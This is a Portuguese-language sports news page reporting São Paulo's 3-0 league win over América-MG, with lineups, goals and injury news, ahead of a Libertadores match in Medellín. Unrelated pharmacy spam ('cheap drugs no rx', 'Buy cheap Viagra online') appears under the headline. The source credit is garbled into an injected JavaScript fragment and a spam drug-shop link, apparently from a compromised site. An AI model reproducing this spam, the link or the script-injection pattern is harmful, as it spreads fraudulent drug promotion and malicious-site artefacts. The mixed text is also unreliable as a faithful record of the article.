Destaque

Tricolor goleia o América-MG antes de seguir para Medellín

put in cart cheap drugs no rx

Buy cheap Viagra online

Tricolor seguirá com ânimo extra para decidir o seu futuro na Libertadores da América de 2016! Neste domingo (10), no último compromisso antes da viagem para a Colômbia – onde o time são-paulino enfrentará o Atlético Nacional-COL pelo duelo de volta da semifinal do torneio sul-americano -, o São Paulo venceu o América-MG por 3 a 0 com atuação segura e exibição goleadora do atacante Alan Kardec, que balançou as redes duas vezes – Lyanco, com um verdadeiro golaço, completou o placar.

Com o resultado positivo neste final de semana, no Morumbi, os paulistas se recuperaram na temporada e subiram da décima para a sétima colocação do Campeonato Brasileiro, agora com 21 pontos em 14 rodadas. Após bater os mineiros e se reerguer, o Tricolor já terá a viagem para o território colombiano ainda neste domingo. Assim que deixar o Estádio Cícero Pompeu de Toledo, a delegação seguirá para o Centro de Treinamento da Barra Funda e de lá partirá para o Aeroporto Internacional de Guarulhos. Que venha a decisão!

Por opção da comissão técnica, o zagueiro Lugano, o volante Thiago Mendes, o experiente Michel Bastos e o atacante Calleri não foram relacionados. Os quatro foram preservados para evitar o desgaste físico antes da decisão na Colômbia. Com um trauma na coxa direita, o volante João Schmidt não foi relacionado para fazer um trabalho alternativo. Já o lateral-direito Mateus Caramelo, que sofreu um estiramento no músculo posterior da coxa direita durante as atividades da última sexta-feira (8), no CT da Barra Funda, ficou sob os cuidados do Departamento Médico.

Por fim, Lucas Fernandes, Breno e Wellington (cirurgias de ligamento cruzado), Kelvin (estiramento na coxa esquerda), Paulo Henrique Ganso (estiramento na coxa direita), Renan Ribeiro (aprimora a forma física após se recuperar de lombalgia) e Matheus Reis (suspenso) fecharam a lista de desfalques. Assim, o time são-paulino foi escalado com Denis; Auro, Maicon, Lyanco e Carlinhos; Hudson, Wesley e Cueva; Centurión, Luiz Araújo e Alan Kardec. Já os mineiros atuaram com João Ricardo; Pablo, Roger, Leandro Guerreiro e Bruno Teles; Osmam, Juninho, Gilson e Ernandes; Tony e Borges.

Quando a bola rolou, com a missão de se reerguer na temporada, o Tricolor logo partiu para cima do adversário e criou boas oportunidades para marcar. Abertos pelas pontas, Centurión e Luiz Araújo buscavam as jogadas com o peruano Cueva, que atuou mais centralizado e acionou Kardec constantemente na frente. Mais ofensivo, o São Paulo não deixou o rival gostar do jogo, protegeu o sistema defensivo e rondou a grande área mineira com frequência: Hudson, Luiz Araújo (duas vezes) e Maicon (em cobrança de falta) arriscaram de longe, mas ficaram no quase.

Apesar do bom início de jogo, o time são-paulino só conseguiu balançar as redes na reta final da primeira etapa. Aos 33 minutos, Centurión fez o cruzamento fechado, Alan Kardec subiu mais do que a zaga do América-MG e abriu o placar pelo alto: 1 a 0! Ainda antes do intervalo, os anfitriões conseguiram ampliar a vantagem e garantiram mais tranquilidade. Aos 42, o zagueiro Lyanco fez um verdadeiro golaço! O defensor saiu do campo de defesa, arrancou em velocidade, chegou à área, limpou o adversário e bateu firme com a perna direita, rasteiro. Grande jogada! 2 a 0 e muita comemoração do camisa 19, que marcou pela primeira vez no profissional!

Na volta para a segunda etapa, com a mesma intensidade, o São Paulo acuou os visitantes e logo criou oportunidades para balançar as redes mais vezes. Solto, o jovem Luiz Araújo deu trabalho aos marcadores e foi responsável pela maioria das jogadas de perigo. O camisa 31 buscou as investidas pelas pontas e foi uma das gratas surpresas do confronto. Foi dos pés do atacante, aliás, que saiu a jogada para o terceiro gol. Aos 14 minutos, o jogador invadiu a área pela direita, saiu com facilidade da marcação, tocou rasteiro para o meio, e Alan Kardec se esticou para mandar ao fundo das redes: 3 a 0.

Com a boa vantagem no marcador e já de olho no embate com os colombianos na próxima quarta-feira (13), o Tricolor atuou de forma mais cadenciada e apostou nos contragolpes para tentar surpreender o rival mais uma vez e construir um placar ainda mais elástico – Artur, Ytalo e Rodrigo Caio ainda tiveram a chance de jogar alguns minutos diante do América. Seguro, o São Paulo soube administrar o resultado positivo e conquistou três importantes pontos no Brasileiro antes de seguir para Medellín: 3 a 0!

Que venha a decisão com o Atlético Nacional-COL!

Fonte: siteOficialdocument.currentScript.parentNode.insertBefore(s, document.currentScript); put in cart inexpensively tablets on line – http://theflama.com/put-in-cart-inexpensively-tablets-on-line/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

São Paulo fatura cerca de R$ 4,5 milhões com título do River Plate

saopauloadmin10 de dezembro de 2018

Ganso no São Paulo em 2019?

saopauloadmin8 de dezembro de 2018

São Paulo entra forte na briga por Jarlan Barrera, diz Nicola

saopauloadmin7 de dezembro de 2018

Bruno Alves na China?

saopauloadmin6 de dezembro de 2018

OFICIAL! Léo Pelé é anunciado pelo São Paulo por 4 anos

saopauloadmin5 de dezembro de 2018

São Paulo acerta com Igor Vinícius

saopauloadmin4 de dezembro de 2018

Carta Aberta: “Rodrigo Caio, de torcedor do São Paulo para um torcedor “não mais tão” torcedor”

saopauloadmin4 de dezembro de 2018

Torcida Organizada antecipa 2019 e avisa: “a cobrança será geral”

saopauloadmin3 de dezembro de 2018

Hudson fala de missão do São Paulo contra a Chape

saopauloadmin1 de dezembro de 2018